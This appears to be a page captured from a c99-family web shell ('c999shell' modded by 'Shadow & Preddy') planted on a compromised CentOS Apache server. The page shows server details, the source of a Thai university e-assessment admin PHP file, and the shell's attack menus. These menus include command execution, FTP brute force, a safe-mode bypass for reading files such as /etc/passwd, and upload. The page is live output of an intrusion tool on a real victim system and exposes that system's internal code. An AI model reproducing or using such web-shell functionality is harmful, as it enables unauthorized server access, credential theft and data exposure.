!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/fileupdate/eassess/admin/   drwxr-xr-x
Free 50.75 GB of 127.8 GB (39.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     2553-02-16-1.0.02-editRRQ.php (13.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
SELECT *
FROM (

SELECT rrq. * , dateAss, officerId
FROM ResultRQ rrq
JOIN DoAssessment da ON rrq.doid = da.doid
WHERE da.defineid =125
AND da.officerId =74
AND da.classId =722
)r1
INNER JOIN (

SELECT rrq. *
FROM ResultRQ rrq
JOIN DoAssessment da ON rrq.doid = da.doid
WHERE da.defineid =125
AND da.officerId =74
AND da.classId =722
)r2 ON r1.doid = r2.doid
WHERE r1.resultRQid < r2.resultRQid
AND r1.sectionRQid = r2.sectionRQid
AND r1.RQid = r2.RQid
ORDER BY r1.RQid, r1.sectionRQid, r1.doid, r1.resultRQid
*/
include_once "template.php";
showHeader();

include_once 
"../class/clsAssessForm.php";
include_once 
"../class/clsDefineAssessment.php";
include_once 
"../class/clsDoAssessment.php";
include_once 
"../class/clsHoldCourse.php";
include_once 
"../class/clsHoldCourseTmp.php";
include_once 
"../class/clsClassAssess.php";
include_once 
"../class/clsClassOpenForAssess.php";
include_once 
"../class/clsCourseAssess.php";
include_once 
"../link/function.php";
include_once 
"../class/clsReg_Program.php";
include_once 
"../class/clsReg_SysSemesterDes.php";        
include_once 
"../class/clsTimeTableAssess.php";
include_once 
"../class/clsReg_AcadYearConfig";
include_once 
"../class/clsOfficerAssess.php";
include_once 
"../class/clsRegistration.php";
include_once 
"../class/clsResultRQ.php";

confirmSubmit();
checkFormat();
openWindow1();

$oCR = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_REG'], $GLOBALS['USER_REG'], $GLOBALS['PASSWORD_REG']);

$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

$oProg = new Program($oCR);
$oAF = new AssessForm($oCA);
$oDA = new DefineAssessment($oCA);
$oDo = new DoAssessment($oCA);
$oSse = new SysSemesterDes($oCR);
$oHC = new HoldCourse($oCA);
$oHCT = new HoldCourseTmp($oCA);
$oHCT2= new HoldCourseTmp($oCA);
$oClassA = new ClassAssess($oCA);
$oClsOpen = new ClassOpenForAssess($oCA);
$oCourse = new CourseAssess($oCA);
$oTTA=new TimeTableAssess($oCA);
$oAYC = new AcadYearConfig($oCR);
$oOA = new OfficerAssess($oCA);
$oReg = new Registration($oCA);
$oTTA2=new TimeTableAssess($oCA);


if(!
$acadYear)
    
$acadYear $GLOBALS["ACADYEAR"];
if(!
$semester)
    
$semester $GLOBALS["SEMESTER"];

if(
$acadYearList == "")
    
$acadYearList $GLOBALS["ACADYEAR"];
if(!
$semesterList)
    
$semesterList $GLOBALS["SEMESTER"];
    
$oAYC->SearchByKey($acadYear,$semester);
$oAYC->GetRecord();
?>

<? // delete surplusRRQ
if(isset($officerId)){
    
$oRRQ = new ResultRQ($oCA);
    
$oRRQ->surplusRRQ($defineid,$officerId,$classId);
    
$record 0;
    
$all $oRRQ->GetRowSelected();
    while(
$oRRQ->GetRecord()){
        
$oRRQ2 = new ResultRQ($oCA);
        
$oRRQ2->deleteByKey($oRRQ->resultRQid);
        
$record++;
    }
    echo 
"delete by officerId = $officerId { $record / $all }";
}

?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<body>
<h1>ลบผลการประเมินที่เกินในตาราง ResultRQ <br>เนื่องจากความผิดพลาดในการลบ record สุดท้ายใน DoAssessment</h1>
 <table width="100%" border="0" align="">
 <tr><td>
       <table width="343" border="0" align="right">
        <tr> 
          <td colspan =7 height="34" align="center" background="../picture/coverBG2.gif"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_1'];?>">&nbsp;</font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_1'];?>">&nbsp;<b>ปีการศึกษา:</b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b><select name="List1" onChange="location.href = '<?php echo $PHP_SELF;?>?acadYearList='+encodeURI(options[selectedIndex].value)+'&amp;semesterList=<?php echo $semesterList;?>'">
              <?php
                $oAy
->RSAcadYearConfigGroupAcY();
                while(
$oAy->GetRecord()) {
?>
              <option value="<?php echo $oAy->acadYear;?><? if($acadYearList == $oAy->acadYear) echo "selected"?>><?php echo $oAy->acadYear;?></option>
              <?php                
                
}
?>
            </select>
            </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_1'];?>">&nbsp;<b>ภาคการศึกษา:<select name="List2" onChange="location.href ='<?php echo $PHP_SELF;?>?semesterList='+encodeURI(options[selectedIndex].value)+'&amp;acadYearList=<?php echo $acadYearList;?>'">
              <?php
                $oSse
->RSSysSemesterDes();
                while(
$oSse->GetRecord()) {
?>
              <option value="<?php echo $oSse->semester;?><? if($semesterList == $oSse->semester) echo "selected"?>><?php echo $oSse->semesterName;?></option>
              <?php
                        
}
?>
            </select>
            </b></font></td>
        </tr>
      </table>
</td></tr>
                  
 <tr><td><form name="pc" method="post" action="<?php echo $PHP_SELF;?>">
      <table width="100%" border="0">
      <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_2"];?>"> 
        <td width="86" height="22" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>ภาคการศึกษาที่</strong></font></td>
        <td width="10" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>ลำดับ</strong></font></td>
        <td width="258" height="22" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>รายการแบบประเมิน</strong></font></td>
        <td width="50" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>&nbsp;</strong></font></td>
        <td width="169" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>ช่วงเวลาในการประเมิน</strong></font></td>
        <td width="29" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>แก้ไข</strong></font></td>
        <td width="22" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>ลบ</strong></font></td>
      </tr>
          <?php
            $numRow 
$oDA->CountDefineidByAcadSem5Flag($acadYearList,$semesterList,'1','6','7','8');
            
$page_size 12;
            
$total_page = (int)($numRow/$page_size);
            if((
$numRow%$page_size) != 0)
                
$total_page++;

            if(isset(
$page_id))
                
$start $page_size*($page_id-1);
            else {
                
$page_id 1;
                
$start 0;
            }
                
$i 0;
    
                
$oDA->RSAssessLimitByAcadSem5Flag($acadYearList,$semesterList,'1','6','7','8',$start$page_size);
                while(
$oDA->GetRecord()){
                    
//นับจำนวนการประเมินว่ามีการประเมินหลังจากที่กำหนดแบบประเมินและช่วงเวลาไปแล้วหรือไม่  ถ้ามีจะไม่สามารถลบการกำหนดช่วงเวลาในการประเมินไปแล้วได้
                    
$numDoAss=$oDo->CountDoidByDefineid($oDA->defineid);
                    
$oAF->SearchByKey($oDA->assid);
                    
$oAF->GetRecord();
                    
//หาความยาวของชื่อแบบประเมิน    
                    
$strNameAss strlen($oAF->nameAss);
                        if((
$i%2) == 0)
                            echo 
"<tr>";
                        else
                            echo 
"<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_4"]."\">";
?>
                  <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php echo $oDA->semester;?>/<?php echo $oDA->acadYear?></font></td>
                  <td align="center"><?php echo $i+1;?></td>
                  <td><a href="<?php echo "$PHP_SELF?semesterList=$semesterList&acadYear=$acadYearList&defineid=$oDA->defineid";?>">

                  <? if($oAF->maintopic == ""){ echo substr($oAF->nameAss,0,49)."<img src = \"../picture/warn.png\" border = \"0\">"$strNameAss strlen($oAF->nameAss);  if($strNameAss >= 49) echo "..."; }else{ echo substr($oAF->maintopic,0,49); $strNameAss strlen($oAF->maintopic);  if($strNameAss >= 49) echo "..."; } ?></a></font></td>

                  <td align="center"> 
                      <? if($oDA->flag == 7){?><img src="../picture/icoa18.jpg" border="0">
                              <?    if($oDA->isPreAssess) { ?><img src="../picture/book1.gif" width="22" height="18" border="0">  
                            <? }else {?><img src="../picture/open_book1.jpg" width="22" height="18" border="0">
                    <? }
                    }elseif(
$oDA->flag == 8){?><img src="../picture/icoa15.jpg" border="0">
                              <?    if($oDA->isPreAssess) { ?><img src="../picture/book1.gif" width="22" height="18" border="0">  
                            <? }else {?><img src="../picture/open_book1.jpg" width="22" height="18" border="0">
                    <? }
                     }elseif(
$oDA->flag == 6){ ?><img src="../picture/icoa14.jpg"  border="0">
                     <? }else{ ?><img src="../picture/icoa15.jpg"  border="0">
                     <? ?></td>
                  <td align="center"><?php  echo abbreDate2($oDA->startDate,'/');?> (ถึง) <?php  echo abbreDate2($oDA->endDate,'/');?>
                  </td>
                  <? if($oDA->flag == 1){ ?> <td align="center">-</td>
                  <? }else{ ?>
                  <td align="center"><a href="editDefineSomeCourse.php?defineid=<?php echo $oDA->defineid;?>&acadYear=<?php echo $oDA->acadYear;?>&semester=<?php echo $oDA->semester;?>&noAss=<?php echo $oDA->noAss;?>&fe=1&back=0 " onClick="return sendRequest(this);" onMouseOver="window.status=''; return true;"><img src="../picture/editnew.gif" width="20" height="21" align="absmiddle" border="0"></a></td>
                  <? ?>
                  <td align="center"> 
                    <? if($numDoAss == '0') { ?>
                    <a href="processDefineSomeCourse.php?method=delete&defineid=<?php echo $oDA->defineid;?>&acadYear=<?php echo $oDA->acadYear;?>&semester=<?php echo $oDA->semester;?>&noAss=<?php echo $oDA->noAss;?>" onClick='return confirmSubmit("คุณต้องการลบข้อมูลแน่นอนใช่หรือไม่ ?")' onMouseOver="window.status=''; return true;" ><img src="../picture/deletenew.gif" width="16" height="19" align="absmiddle" border="0"></a> 
                    <? } else { ?>
                    <img src="../picture/deleted.gif" width="16" height="19" align="absmiddle" border="0"> 
                    <? ?>
                  </td>
                  </tr>
                  <?php
                        $i
++;
                } 
//end while oDA
                        
        
if($i == 0){
?>
          <tr> 
            <td colspan="7" height="22" align="center"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">** 
              ไม่ปรากฏรายการในฐานข้อมูล **</font></td>
          </tr>
<?php
        
}
?>

            <tr> 
              <td><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">หน้า-&gt; 
                <?php
                    
for ($num=1$num<=$total_page$num++) {    
                        if(
$num == $page_id)
                            echo 
$num." ";
                        else {
?>
                <a href="addDefineSomeCourse.php?page_id=<?php echo $num;?>&semesterList=<? echo $semesterList ?>&acadYearList=<? echo $acadYearList ?>"><?php echo '[ '.$num.' ]';?></a> 
                <?php
                        
}
                    }
?>
                </font></td>
              <td width="120" align="right"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">รวม 
                <?php echo $numRow;?> รายการ</font></td>
            </tr>
          </table>
    </form>
</td>
</tr>
<br>
<tr><td>
<table width="ุ0%" border="0">
<tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
<td align="center" bgcolor="#FFFFFF">รหัส</td>
<td bgcolor="#FFFFFF"><font size="2" face="Microsoft Sans Serif">ชื่อวิชา</font></td>
<td bgcolor="#FFFFFF" align="center">ชั้นปี</td>
<td align="center" bgcolor="#FFFFFF">กลุ่ม</td>
</tr>
<?
if(isset($defineid)){
    
    
$i 0;
    
$oHC->SearchDistinctClassIdByDefineid($defineid);
    while(
$oHC->GetRecord()) {
//    $oTTA->RSDistinctClassIdJoinHC($defineid);
//    while($oTTA->GetRecord()){
        
$oClassA->SearchByKey($oHC->classId);
        
$oClassA->GetRecord();

        
$oCourse->SearchByKey($oClassA->courseId);
        
$oCourse->GetRecord();
?>    <tr>
    <td align="center" bgcolor="#FFFFFF"><?php echo $oCourse->courseCode;?></td>
    <td bgcolor="#FFFFFF"><font size="2" face="Microsoft Sans Serif">
    <a href="<?php echo "$PHP_SELF?semesterList=$semesterList&acadYear=$acadYearList&defineid=$oDA->defineid&classId=$oHC->classId&courseId=$oClassA->courseId";?>">
    <?php echo $oCourse->courseName;?></a></font></td>
    <td bgcolor="#FFFFFF" align="center"><? echo $oClassA->studentYear ?></td>
    <td align="center" bgcolor="#FFFFFF"><?php echo $oClassA->section ?></td>
    </tr>
<?    }
}
?>
</table></td></tr>
<tr><td>
<table width="ุ0%" border="0">
    <tr>
    <td>ชื่ออาจารย์</td>
    <td>เต็ม</td>
    <td>ประเมิน</td>
    <td>เกิน</td>
    <td>กระทำ</td></tr>
<?
if(isset($classId)){
    
$oRRQ = new ResultRQ($oCA);
    
$oTTA->RSDistinctOfId($classId);
    while(
$oTTA->GetRecord()){
        
$teacher=$teacher+1;
        
$oOA->SearchByKey($oTTA->ttOfId);
        
$oOA->GetRecord();

        
$numAllCourseReg=0;
        
$numAllCourseReg $oReg->CTByAcYSeClassIdCoId($acadYearList,$semesterList,$classId,$courseId);
        
$numAllDo=$numAllCourseReg;
                
// หลายสัปดาห์
        
if($oOA->officerId != && $ttId==0){
            
$week=0;
            
$oTTA2->RSJoinHCByDefineidClIdOfId($defineid,$classId,$oOA->officerId);
            while(
$oTTA2->GetRecord()){
                
$week++;
            }
            
$numAllDo=$numAllCourseReg*$week;
        }

        
$numCourseDoAss 0;
        if(
$ttId==0){
            
$numCourseDoAss=$oDo->CountDoidByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$oOA->officerId);
        }else{
            
$numCourseDoAss=$oDo->CountDistinctStdByDefineidOfficeridClassIdttId($defineid,$officerId,$classId,$ttId);
        }

        
$oRRQ->surplusRRQ($defineid,$oOA->officerId,$classId);
        
$plus $oRRQ->GetRowSelected();
?>
        <tr>
             <td><? echo 'อ.'.$oOA->officerName.'  '.$oOA->officerSurname?></td>
            <td><? echo $numAllCourseReg?></td>
            <td><? echo $numCourseDoAss?></td>
            <td><? echo $plus?></td>
            <td><a href="<?php echo "$PHP_SELF?semesterList=$semesterList&acadYear=$acadYearList&defineid=$oDA->defineid&classId=$classId&courseId=$courseId&officerId=$oOA->officerId";?>" title='ลบ'>[X]</a></td>
        </tr>
<?
    
}
}
?>
</table>
</td></tr>
</table>
</body>
<?php

$oCA
->Disconnect();
$oCR->Disconnect();
showFooter();
?>
<?php 
    
function getAllCourseCode($defineid,$oHC,$oClassA,$oCourse)
    {
        
$oHC->SearchDistinctClassIdByDefineid($defineid);
        while(
$oHC->GetRecord()){
            
$oClassA->SearchByKey($oHC->classId);
            
$oClassA->GetRecord();
            
$oCourse->SearchByKey($oClassA->courseId);
            
$oCourse->GetRecord();
            echo 
$oCourse->courseCode." ,";
        }
    }
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0174 ]--